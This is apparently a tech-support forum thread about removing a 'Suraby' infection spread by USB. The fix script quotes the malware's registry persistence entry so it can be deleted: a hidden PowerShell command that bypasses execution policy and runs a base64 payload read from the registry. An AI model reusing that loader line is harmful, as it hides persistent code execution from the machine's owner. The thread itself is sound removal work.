Suraby virus

system · November 2, 2015, 1:31pm

My laptop is been infected by suraby virus

I have attached the scan log of Malware Removal tool and FRST and Additions file from Farbar

please assist me in removing it

Pondus · November 2, 2015, 2:45pm

are you using a USB stick / removable drive ?

i see from Malwarebytes log that it detected/quarantined a autorun worm so you may have a infected removable drive

essexboy · November 2, 2015, 3:05pm

You need to clean the USB drive

Download MCShield to your desktop and install
It will initially run a scan and show the result as a toaster by the system clock
Then in the control centre select scanner and tick unhide items on flash drives

https://dl.dropbox.com/u/73555776/mcshield%20unhide.JPG

Plug in the drive and McShield will start a scan

Then get the log which will be located under the logs tab on the main page

And post that

THEN

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM\...\Winlogon: [LegalNoticeCaption] 81u3f4nt45y - 24.01.2007 - Surabaya HKLM\...\Winlogon: [LegalNoticeText] Surabaya in my birthday Don't kill me, i'm just send message from your computer Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0 HKU\S-1-5-21-3895822533-1409361123-1344483373-1000\...\Run: [{649819E0-CB91-4974-9473-D62E987C6E63}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\OVTAFOJGFKSB').LXSUHDOFY))); Toolbar: HKU\S-1-5-21-3895822533-1409361123-1344483373-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File 2015-10-05 06:08 - 2015-11-01 12:09 - 00000000 ____D C:\Users\user\AppData\Local\{FEC6C89A-DA6E-A422-B7F6-81CA939E7D52} 2009-07-14 05:01 - 2009-07-14 06:44 - 104460288 ___SH () C:\ProgramData\msxicnz.exe CustomCLSID: HKU\S-1-5-21-3895822533-1409361123-1344483373-1000_Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\localserver32 -> C:\Users\user\AppData\Local\Chromium\Application\46.0.2480.0\delegate_execute.exe (The Chromium Authors) <==== ATTENTION CustomCLSID: HKU\S-1-5-21-3895822533-1409361123-1344483373-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader.dll () Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Could you please zip the folder C:\FRST and upload to a sharing site for me to collect

Suraby virus

Announcements